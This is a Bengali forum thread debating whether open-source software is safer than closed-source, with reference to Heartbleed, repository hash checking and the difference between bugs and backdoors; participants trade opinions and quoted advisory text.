সাইফুল ভাই আপনি কিন্তু মেইন রিপো তে প্যাকেজ বা ক্ষতিকারক সোর্স ইচ্ছেকৃতভাবে ঢুকিয়ে দিতে পারছেন না যেটুকু যা করছেন তা মেইন রিপো থেকে সরে এসে নিজের মতো করে গড়া নিজের সার্ভারে/মিররে। যতই ঘুরপথে নেন আর ফাঁকি দেন এটা তো আর সরাসরি মূল রিপো না।
একজন সঙ্গীত শিল্পী সৃষ্টির প্রথম প্রয়াস শুরুই হয় ভোর সকালে সারগাম করে গলা সাধা দিয়ে। তাতে আর কারোর না হোক নিজ পরিবারের মানুষজনের সকালের সুখঘুমটা অবশ্যই বিঘ্নিত হয়। তবে যদি বিরক্তির মাত্রাটাকে আমলে নিয়ে গলা সাধায় বাধ সাধি তবে সঙ্গীত শিল্পী আর আমরা আগামীতে পাবো না। এইটুকু যদি বোধে থাকে আর দর্শকমাতানো শিল্পী যদি নিজের ঘরেই পেতে চাই তবে ঐ গলা সাধার সময়ে নিজের সুখঘুমটুকু বিসর্জন দেবার মানসিকতা গড়ে তুলতে হবে, আমার আপনার সবারই।
লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত
উন্মোচন করেছিলেন (৩রা এপ্রিল ২০১৪ইং) এবং যথাদ্রুত সম্ভব (৭ই এপ্রিল ২০১৪ইং) এই বাগ দূরীভূতও হয়েছে।
According to Mark J. Cox of OpenSSL, Neel Mehta of Google's security team reported Heartbleed on April 1, 2014.
রিং লিখেছেন:উন্মোচন করেছিলেন (৩রা এপ্রিল ২০১৪ইং) এবং যথাদ্রুত সম্ভব (৭ই এপ্রিল ২০১৪ইং) এই বাগ দূরীভূতও হয়েছে।
According to Mark J. Cox of OpenSSL, Neel Mehta of Google's security team reported Heartbleed on April 1, 2014.
ভাই আমি একজন মানুষ এবং আমার ভুল হলেও হতে পারে। তবে নিচে উল্লেখিত অংশটা ছিলো আমার সংগৃহীত ও উল্লেখিত তথ্যের উৎস।
Who coordinates response to this vulnerability?
Immediately after our discovery of the bug on 3rd of April 2014, NCSC-FI took up the task of verifying it, analyzing it further and reaching out to the authors of OpenSSL, software, operating system and appliance vendors, which were potentially affected. However, this vulnerability had been found and details released independently by others before this work was completed. Vendors should be notifying their users and service providers. Internet service providers should be notifying their end users where and when potential action is required.
লেখাটি CC by-sa 3.0 এর অধীনে প্রকাশিত
আপনার নজরে বোধহয় তৌফিক ইমামের দেয়া প্রশ্নের মাঝেই হ্যাশ চেকিং সংক্রান্ত অংশটা বাদ পড়ে গিয়েছে। শুধু মূল রিপোর মিরর হলেই চলে যায় না একটা মিরর রিপোর প্যাকেজগুলো। ওগুলোর প্রতিটার হ্যাশসাম মিলতে হয় মূল সার্ভারে থাকা রিপোর প্যাকেজ হ্যাশসামের সাথে। আপনি যে সফটওয়্যার/টুলস ম্যানিপুলেট করবেন তাতে দুইটা লাইন/শব্দ হলেও তো যোগ/বিয়োগ করবেন? তাতেই কিন্তু প্যাকেজ বিল্ড করার পর হ্যাশসামে গড়মিল হয়ে যাবে।
দাদা আমি কি বলেছি যারা হ্যাস চেক করে তারা নবীশ ব্যবহারকারী ?
কটা এপ ইন্সটল করে হ্যাস চেক করেছেন এ পর্যন্ত ?
কজন এডভান্স সিস্টেম উইজারকে দেখেছে চিপায় পড়তে ?
আরে দাদা https://help.ubuntu.com/community/UbuntuHashes এর একটা লাইভ ম্যানুপুলেটেড মিরর করতে ঠিক কতক্ষন লাগে ? আপনি কি এদের ডিস্ট্রোর সাথে এই ঠিকানার হ্যাস মিলাবেন না ?
যাই হোক দাদা তালগাছ যার মন চায় সে নিক আমার কিছু আসে যায় না। এই টপিকে এটাই লাস্ট কমেন্ট।
সাইফুল ভাই তৌফিক ইমামের করা প্রশ্নটা ছিলো যে -- যদি কেউ নিজে ম্যানিপুলেট করা সফটওয়্যার বানায়ও তবে সেটা কি মেইন রিপোতে ইনজেক্ট করে দিতে পারবে কি না? সরাসরি প্রশ্নটার উত্তরে যদি "হ্যাঁ' হয় তো ব্যাখ্যাটুকু দিন না ভাই। কেন আর কিভাবে করা যাবে "না' সে ব্যাখ্যা তো আমি আমার জ্ঞান অনুযায়ী দিচ্ছিই।
দাদা আমি কি বলেছি যারা হ্যাস চেক করে তারা নবীশ ব্যবহারকারী ? কটা এপ ইন্সটল করে হ্যাস চেক করেছেন এ পর্যন্ত ?
ডেবিয়ান সিস্টেমে apt-get বা অন্যান্য সব প্যাকেজ ইন্সটলারই এই হ্যাশচেক করে তারপর ডাউনলোড করা প্যাকেজ সিস্টেম এক্সট্রাক্ট করে। হ্যাশ না মিললে প্যাকেজ এরর রিটার্ন করবে।
কজন এডভান্স সিস্টেম উইজারকে দেখেছে চিপায় পড়তে?
ভাইরে প্যাকেজ বা রিপোজিটরি স্মুফিংয়ের জালে ধরা খাবার সুযোগ যে একেবারেই নগন্য। সিস্টেমই তো এখানে সাধারন ব্যবহারকারীর নিরাপত্তা নিশ্চিত করছে।
আরে দাদা https://help.ubuntu.com/community/UbuntuHashes এর একটা লাইভ ম্যানুপুলেটেড মিরর করতে ঠিক কতক্ষন লাগে ? আপনি কি এদের ডিস্ট্রোর সাথে এই ঠিকানার হ্যাস মিলাবেন না ?
যদিও এটা প্যাকেজ রিপো না, আইএসও বা সিডি/ডিভিডি রিপো তবুও এখানকার একটা আইএসও সামান্যতম পরিবর্তন করে দেখেন তো রিবিল্ডে হ্যাশ মিলে কি না? আর ফলাফলে কাস্টম রিবিল্ড করা ছাড়া ঐ আইএসওটা বুট করে কি না?
লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত
ভাই আমি একজন মানুষ এবং আমার ভুল হলেও হতে পারে। তবে নিচে উল্লেখিত অংশটা ছিলো আমার সংগৃহীত ও উল্লেখিত তথ্যের উৎস।
ওওহ, রিং ভাই মনে হয় একই পেজে থাকা এই দুটো প্যারা কোট করতে মনে হয় ভুলে গিয়েছিলেন...
Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.
এবং...
Some operating system distributions that have shipped with potentially vulnerable OpenSSL version:
Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
CentOS 6.5, OpenSSL 1.0.1e-15
Fedora 18, OpenSSL 1.0.1e-4
OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
FreeBSD 10.0 - OpenSSL 1.0.1e 11 Feb 2013
NetBSD 5.0.2 (OpenSSL 1.0.1e)
OpenSUSE 12.2 (OpenSSL 1.0.1c)
মজার ব্যাপার হচ্ছে এতোগুলো মুক্ত সফটওয়্যারের রিপোতে এই বাগ মোটামুটি দুই বছর লুকিয়ে থাকলো আর এতশত এক্সপার্ট কোড দেখনেওয়ালারাও ধরতে পারলো না।
কথার কথা, ধরেন OpenSSL এর সিকিউরিটি আমার জন্য কোন এক ভাবে খুব গুরূত্বপূর্ণ হয়ে গেলো। তো তখন এইরকম সিচুয়েশনে আমি হলে কি করতাম? প্রতি লাইন কোড চেক করে বাগ দুর করতাম? নাকি ধরে নিতাম যে বাঘা বাঘা প্রোগ্রামাররা যেটাকে সেফ বলেছেন সেটাকেই নিশ্চিন্ত মনে ব্যবহার করা যায়? তো আমি, আমজনতা যদি শেষ পর্যন্ত আরেকজনের উপরেই বিশ্বাস রেখে রেখে সফটওয়্যার ব্যবহার করতে হয়, তাহলে কি এটা খুব গুরূত্বপূর্ণ যে এর কোড ওপেন না ক্লোজড, নাকি আমি এর সাথে রিলেভেন্ট ইনফরমেশন (কে বানিয়েছে এবং তার রেপুটেশন কেমন, সফটওয়্যারের ফীডব্যাক কেমন, ইত্যাদি) গুলোকে বেশি গুরুত্ব দেবো?
ধরে নিচ্ছি আপনি কখনো না কখনো VLC ব্যবহার করেছেন। তো কখনো কি এর সোর্স চেক করে দেখেছেন যে কি আছে এতে? আর এটি ইউজার এক্সপেরিয়েন্স রিলেটেড কি কি ইনফরমেশন সংগ্রহ করে?
আর এক্সপ্লয়েটের ব্যাপারে একটা শুধু উদাহরণ দিয়ে রাখি, এ্যান্ড্রয়েড, ওপেন সোর্স হওয়া সত্যেও প্রায় প্রতিটি ভার্সান রুট করা সম্ভব, কিভাবে?
বিশ্বাস রাখা ভালো, যতক্ষণ পর্যন্ত তা অন্ধ না হয়ে যায়।
লেখাটি CC by 3.0 এর অধীনে প্রকাশিত
এই ওপেন এসএসএল ডেক্সটপ কম্পিউটিংয়ে ব্যবহৃত কোন নিয়মিত সফটওয়্যার বা টুলস নয় ফলে সাধারন ব্যবহারকারীদের কম্পিউটারে এটার দ্বারা কোনরূপ কোন ক্ষতিসাধনের সম্ভাবনা প্রায় নেই বললেই চলে।
তবে হ্যাঁ এটা ঠিক যে অনলাইনে ব্যক্তিতথ্যের নিরাপত্তা অবশ্যই উভয়প্রান্তেই ক্ষতিগ্রস্ত হয়েছে।
লাইন দুটো কন্ট্রাডিকটরি হয়ে গেল না? 'অনলাইনে ব্যক্তিতথ্য' কি অসাধারণ ব্যবহারকারীদের থাকে?
OpenSSL সাধারণ ব্যবহাকারীরাও ব্যবহার করেন অসাধারণ সফটওয়্যারের ডিপেন্ডেন্সি হিসেবে। দয়া করে "কোথায় ব্যবহার করে দেখিয়ে দিন" টাইপের অযথা বালখিল্য প্রশ্ন করবেন না। আপনার ভাল করেই জানার কথা কোথায় কোথায় করে।
সফটওয়্যারের বাগ আর ইচ্ছেকৃতভাবে কারোর দ্বারা যোগ করা ক্ষতিকারক কোড/এক্সপ্লয়েট/ব্যাকডোর কিন্তু এক জিনিষ না। যদি দুটো একই জিনিষ হয়ে থাকে অনুগ্রহ করে আমাকে একটু জানাবে, বুঝিয়ে বলবে।
আমার পয়েন্টটা এখানেই। "মুক্ত সফটওয়্যার ব্যবহার করলে আপনি নিরাপদ" এই প্রবাদ মানতে আমার প্রবল আপত্তি। আপনি 'বাগ' নামেই ডাকুন আর 'ব্যাকডোর' নামেই ডাকুন, দুটোই secutiry vulnerbility, তাই না! অতএব, দিন শেষে এই সম্ভাবনা দুই দিকেই থাকছে।
যাকগে, ব্যস্ত দিনকাল যাচ্ছে। এই আজাইরা বাহাসে আর নষ্ট করার মত সময় দিতে পারছি না। বিদায়।
সাইফুল ভাইকে ধন্যবাদ ১ম মন্তব্যটি করার জন্য।
সাইফুল ভাই আপনি একটি গুরুত্বপূর্ণ ইস্যু তুলে ধরেছেন। বিভিন্ন দেশের সরকার নানান ইন্টারেস্ট থেকেই ব্যক্তিগত তথ্যে উকিঝুঁকি মারছে। তাই এটি বন্ধ করা বেশ দুরুহ ব্যাপার।
এক্ষেত্রে আমার মতামত হল আমি খালি মাঠে গোল দিতে দিব না। আমি আমার পক্ষ থেকে সর্বোচ্চ চেষ্ট করব যাতে করে আমার ব্যক্তিগত তথ্যে কেউ উকিঝুকি না মারতে পারে এবং এর জন্য নিজেকে একজন সচেতন প্রযুক্তি ব্যবহারকারী হিসেবে গড়ে তুলতে সচেষ্ট হব।
বাক্যবাগীশ ভাই।
আপনি আমার কাছে যা জানতে চেয়েছিলেন তার উত্তর আগেই রিং ভাই দিয়ে দিয়েছেন। সেটুকুই যথেষ্ট। আমি আর নতুন করে কিছু বললাম না।
প্রিয় সবাই!
প্রজন্ম ফোরামে এর আগে আমার কোন পোস্টে এতটা মন্তব্য/প্রতুত্তর আসেনি। সবাই মিলে যে উন্মুক্ত আলোচন করলেন এর জন্য আপনাদের সবাইকে ধন্যবাদ জানাচ্ছি।
আপনাদের আলোচনায় আমার যে বিষয়টা ভাল লাগল তা হল আমরা সবাই ব্যক্তিগত তথ্যচুরির বিষয়টি অবগত আছি। এই জানাই আমাদের ভবিষ্যৎ কর্মের পাথেয় হোক এই আশাই রইল।
রিং লিখেছেন:এই ওপেন এসএসএল ডেক্সটপ কম্পিউটিংয়ে ব্যবহৃত কোন নিয়মিত সফটওয়্যার বা টুলস নয় ফলে সাধারন ব্যবহারকারীদের কম্পিউটারে এটার দ্বারা কোনরূপ কোন ক্ষতিসাধনের সম্ভাবনা প্রায় নেই বললেই চলে।
রিং লিখেছেন:তবে হ্যাঁ এটা ঠিক যে অনলাইনে ব্যক্তিতথ্যের নিরাপত্তা অবশ্যই উভয়প্রান্তেই ক্ষতিগ্রস্ত হয়েছে।
লাইন দুটো কন্ট্রাডিকটরি হয়ে গেল না? 'অনলাইনে ব্যক্তিতথ্য' কি অসাধারণ ব্যবহারকারীদের থাকে?
না হয়নি। ভাইরে আমি বুঝিয়েছিলাম অফলাইন আর অফলাইন ব্যবহারকারী হিসেবে। সেখানে তুমি তো নিজেই বুঝে নিলে সাধারন আর অসাধারন ব্যবহারকারী হিসেবে। ওপেন এসএসএল মূলত অনলাইনে কোন ব্যক্তিতথ্য (পাসওয়ার্ড, সিক্রেট কী, ক্রেডিট কার্ডের তথ্য) পরিবহনের সময়ে সেগুলোর নিরাপত্তা বিধানের লক্ষ্যে পরিবহন পথ নিরাপদ করবার একটা প্রক্রিয়া। তোমার হিসাবেও যদি ধরি তো সাধারন আর অসাধারন ব্যবহারকারী দুইজনের ক্ষেত্রেই বিষয়টা একই ঘটবে। অনলাইনে/ওয়েবসাইটে তথ্যগুলো দিলে নিরাপত্তা বিপন্ন হলেও হতে পারে তবে অফলাইনে বা নিজের পিসিতে রাখলে নয়। 
OpenSSL সাধারণ ব্যবহাকারীরাও ব্যবহার করেন অসাধারণ সফটওয়্যারের ডিপেন্ডেন্সি হিসেবে। দয়া করে "কোথায় ব্যবহার করে দেখিয়ে দিন" টাইপের অযথা বালখিল্য প্রশ্ন করবেন না। আপনার ভাল করেই জানার কথা কোথায় কোথায় করে।
উপরের অংশে যেটুকু আলোচনা করেছি তাতে নিশ্চয়ই বোঝা যাচ্ছে যে "বালখিল্য' করতে প্রশ্নটা করিনি, জানি বলেই জানতে চেয়েছি তোমার মতামত এবং যথাসম্ভব সঠিক তথ্যটা জানাতে চেয়েছি সবাইকে।
রিং লিখেছেন:সফটওয়্যারের বাগ আর ইচ্ছেকৃতভাবে কারোর দ্বারা যোগ করা ক্ষতিকারক কোড/এক্সপ্লয়েট/ব্যাকডোর কিন্তু এক জিনিষ না। যদি দুটো একই জিনিষ হয়ে থাকে অনুগ্রহ করে আমাকে একটু জানাবে, বুঝিয়ে বলবে।
আমার পয়েন্টটা এখানেই। "মুক্ত সফটওয়্যার ব্যবহার করলে আপনি নিরাপদ" এই প্রবাদ মানতে আমার প্রবল আপত্তি। আপনি 'বাগ' নামেই ডাকুন আর 'ব্যাকডোর' নামেই ডাকুন, দুটোই secutiry vulnerbility, তাই না! অতএব, দিন শেষে এই সম্ভাবনা দুই দিকেই থাকছে।
ভাইরে তুমি/তোমরা একটা সহজ বিষয় সোজা করে না বলে কেন ঘুরপথে বারংবার বলে যাচ্ছো তা তোমরাই ভালো জানো। তবে আমি স্পষ্ট করে যেটুকু বুঝি তাতে "বাগ' বলতে সফটওয়্যারের সেই ত্রুটিকে বোঝায় যেটুকু কেউ ইচ্ছে করে তৈরী করে না। অনেকের করা কোড মিলে যেহেতু একটা সফটওয়্যার তৈরী হয় তাই একের করা কোড আরেকজনের কোডের সাথে সামান্য মিসম্যানেজ হলেই সৃষ্টি হতে পারে যে কোন রকমের সমস্যার। এই "বাগ' বা ত্রুটিটাই যদি কেউ বা কোন কোম্পানী ইচ্ছেকৃতভাবে তৈরী করে দেয়া অন্য কারোর অনৈতিক সুবিধার লক্ষ্যে তবে সেটা বলে "ব্যাকডোর'।
অতএব, সফটওয়্যার "বাগ' == নিয়মিত চলমান অবস্থার মাঝেই যে কোন সফটওয়্যারে হুট করেই সৃষ্ট/আবিষ্কৃত কোন সমস্যা, যেটা ধরা পড়া মাত্রই সারিয়ে তোলার উদ্যোগ নেয়া হবে এবং সকল ব্যবহারকারীকে সতর্ক করে দেয়া হবে ত্রুটিটির বিষয়ে। আর সফটওয়্যার "ব্যাকডোর' == সফটওয়্যারের ব্যবহারে নির্দিষ্ট কিছু ব্যক্তি বা প্রতিষ্ঠানের জন্য ইচ্ছেকৃতভাবে সৃষ্ট সমস্যা যেটা প্রযুক্তিবিদদের কাছে ধরা পড়ে গেলে নতুন করে আরেকটা চোরাই পথ তৈরী করে দেয়া হবে কিন্তু কোনক্রমেই ত্রুটিটা সারিয়ে তোলা হবে না।
মুক্তপ্রযুক্তির সফটওয়্যারগুলোর ক্ষেত্রে কোন মুক্তপ্রযুক্তি মানোন্নয়নকারীই "ব্যাকডোর' তো দূরে থাক ইচ্ছেকৃতভাবে একটা "বাগ' রেখেও কোন সফটওয়্যারের কোড মুক্তপ্রযুক্তির জগতে উন্মুক্ত করে না। অপরপক্ষে ক্লোজড বা লুকায়িত সোর্সের সফটওয়্যারগুলোতে আজ অবদি যে "ব্যাকডোর'গুলো পাওয়া গেছে সেগুলোর প্রতিটাই আমজনতা ব্যবহারকারীদের তথ্যে বিশেষ গোয়েন্দাবৃত্তি/চুরি/বেদখলের লক্ষ্যেই তৈরীকৃত বলে প্রমাণিত হয়েছে।
খেয়াল করে দেখো যে, এই হার্টব্লিড বাগে আক্রান্ত কোন সিস্টেম থেকে কোন তথ্য স্বয়ংক্রিয়ভাবে কোথাও আপলোড হয়ে যায়নি কিংবা হ্যাকার কর্তৃক আক্রান্ত হওয়া ছাড়া তথ্য ক্ষতিগ্রস্ত হবার মতো পর্যায়ের অনিরাপদ থাকলেও ক্ষতিগ্রস্ত হয়নি এবং "বাগ' রিপোর্ট হবার পর দ্রুততম সময়ে এই ত্রুটি সারিয়ে ফেলা গিয়েছে। একই সাথে সকল ব্যবহারকারীদেরকে বিষয়টা সম্পর্কে গনবিজ্ঞপ্তি দিয়ে জানিয়েছেন সফটওয়্যারটির প্রস্তুতকারক/দের পক্ষ থেকে। পক্ষান্তরে ক্লোজড সোর্স পন্যের মাঝে বিখ্যাত মাইক্রোসফটের উইন্ডোজ ওএস এ "এনএসএ কী নামক ব্যাকডোর'টি আজ অবদি ভিন্নভিন্ন নামে বিদ্যমান। এটাকে সারিয়ে তোলা দূরে থাক সরিয়ে নেবার কোন চেষ্টা না করে বরংচ মাইক্রোসফট এটাকে ভি্ন্ন নামে একটা থেকে আরেকটা ওএস রিলিজেের সাথে ব্যবহারকারীদের সাথে কম্পিউটারে ঢুকিয়ে দিয়েছে। এবং ধরা পড়বার পর বিষয়টা নিয়ে নিজের ব্যবহারকারীদে নিরাপত্তা বিধানে কি করা হচ্ছে, কি করনীয় সে বিষয়টা কোনদিনই কখনো পরিষ্কার করে বলেনি এমএস।
"মুক্ত সফটওয়্যার ব্যবহার করলে ব্যবহারকারী নিরাপদ' এই প্রবাদ মানতে তোমার প্রবল আপত্তিটুকু আশা করি দ্রুতই লাঘব হতে যাচ্ছে।
যাকগে, ব্যস্ত দিনকাল যাচ্ছে। এই আজাইরা বাহাসে আর নষ্ট করার মত সময় দিতে পারছি না। বিদায়।
তোমার কাছে কেন এটা হুটকরে "আজাইরা বাহাস' মনে হলো আমি জানি না। তবে আমার কাছে এই আলোচনাগুলো আসলেই গুরুত্বপূর্ণ ছিলো। কিছু কিছু অংশ থেকে আমি নিজের জ্ঞান ঝালিয়ে নিতে পেরেছি, নতুন কিছু শিখেছি আবার কোথাও কোথাও নিজের জানা থেকে সবাইকে জানাতে চেষ্টা করেছি। এটাই সুস্থ বিতর্কের মাধ্যমে জ্ঞানের চর্চা। ভালো থেকো, নিরাপদে থেকো প্রযুক্তি জীবনে সে কামনা রইলো।
লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত
প্রজন্ম ফোরাম » তথ্য ও যোগাযোগ প্রযুক্তি » ওপেন সোর্স ও বাংলা কম্পিউটিং » "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ
০.১৩৬২৭০০৪৬২৩৪১৩ সেকেন্ডে তৈরী হয়েছে, ৯২.৩৬৮০৯৫৩৪৬৪০৪ টি কোয়েরী চলেছে